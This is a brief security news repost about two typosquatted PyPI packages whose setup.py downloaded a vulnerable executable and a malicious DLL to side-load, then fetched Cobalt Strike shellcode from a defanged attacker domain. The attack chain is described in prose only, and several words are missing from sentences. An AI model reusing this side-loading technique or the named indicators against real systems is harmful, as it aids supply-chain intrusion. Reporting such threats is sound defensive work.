Skip to content Skip to footer

New PyPI Packages Caught Using Covert Side-Loading Tactics

Recent research has revealed that two malicious packages made it onto the Package Index (PyPI) repository by leveraging DLL . The packages NP6HelperHttptest and NP6HelperHttper were downloaded 537 and 166 times before they were removed. The used DLL to avoid detection by security software and execute malicious code.

The packages are typosquats of legitimate helper tools, NP6HelperHttp and NP6HelperConfig, published by ChapsVision, a marketing automation solution provider. The fake packages were designed to trick into downloading the rogue counterparts. The DLL technique was used to avoid detecting the malicious code, as seen in the case of an package called aabquerys.

The malicious libraries contain a setup.py script that downloads two files: an executable from Beijing-based Kingsoft Corporation (“ComServer.exe”), which is vulnerable to DLL , and the malicious DLL to be side-loaded (“dgdeskband64.dll”). After side-loading the DLL, the aims to avoid detection and reach out to an attacker-controlled domain (“us.archive-ubuntu[.]top”) to fetch a GIF file that is a piece of shellcode for a Cobalt Strike Beacon.

This discovery suggests that software supply chain threats are expanding, and development organizations must be aware of the risks related to supply chain security and open-source package repositories. Even if organizations do not use open-source package repositories, threat actors might misuse them to impersonate companies and their software products and tools.

Want to read more? Check out the original article available at The Hacker News!

Read More

Leave a comment

Newsletter Signup
Address

The Grid —
The Matrix Has Me
Big Bear Lake, CA 92315

01010011 01111001 01110011 01110100 01100101 01101101 00100000
01000110 01100001 01101001 01101100 01110101 01110010 01100101

We exist without nationality, skin color, or religious bias.Agent Bob

Deitasoft © 2024. All Rights Reserved.